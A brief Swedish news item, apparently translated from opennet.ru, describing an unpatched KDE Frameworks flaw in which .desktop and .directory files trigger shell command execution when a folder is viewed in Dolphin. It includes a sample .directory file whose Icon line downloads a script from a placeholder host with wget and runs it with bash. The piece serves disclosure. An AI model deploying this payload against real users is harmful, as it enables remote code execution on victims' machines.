Sårbarhet för körning av KDE-kod vid visning av en lista med filer

I KDE identifieras sårbarhet, som tillåter en angripare att utföra godtyckliga kommandon när en användare visar en katalog eller ett arkiv som innehåller specialdesignade ".desktop"- och ".directory"-filer. En attack kräver att användaren helt enkelt visar en lista med filer i Dolphin filhanterare, laddar ner en skadlig skrivbordsfil eller drar en genväg till skrivbordet eller till ett dokument. Problemet visar sig i den nuvarande versionen av bibliotek KDE-ramar 5.60.0 och äldre versioner, upp till KDE 4. Sårbarheten kvarstår resterna okorrigerad (CVE ej tilldelat).

Problemet orsakas av en felaktig implementering av klassen KDesktopFile, som vid bearbetning av variabeln "Icon", utan korrekt escape, skickar värdet till funktionen KConfigPrivate::expandString(), som utför expansion av skalspecialtecken, inklusive bearbetning strängarna "$(..)" som kommandon som ska köras . Tvärtemot kraven i XDG-specifikationen, implementering avslöjande skalkonstruktioner produceras utan att separera typen av inställningar, dvs. inte bara när man bestämmer kommandoraden för programmet som ska startas, utan också när man anger vilka ikoner som visas som standard.

Till exempel att attackera tillräckligt skicka användaren ett zip-arkiv med en katalog som innehåller en ".directory"-fil som:

[Desktop Entry]
Type=Directory
Ikon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

När du försöker se innehållet i arkivet i Dolphin-filhanteraren, kommer skriptet https://example.com/FILENAME.sh att laddas ner och köras.


Källa: opennet.ru

Lägg en kommentar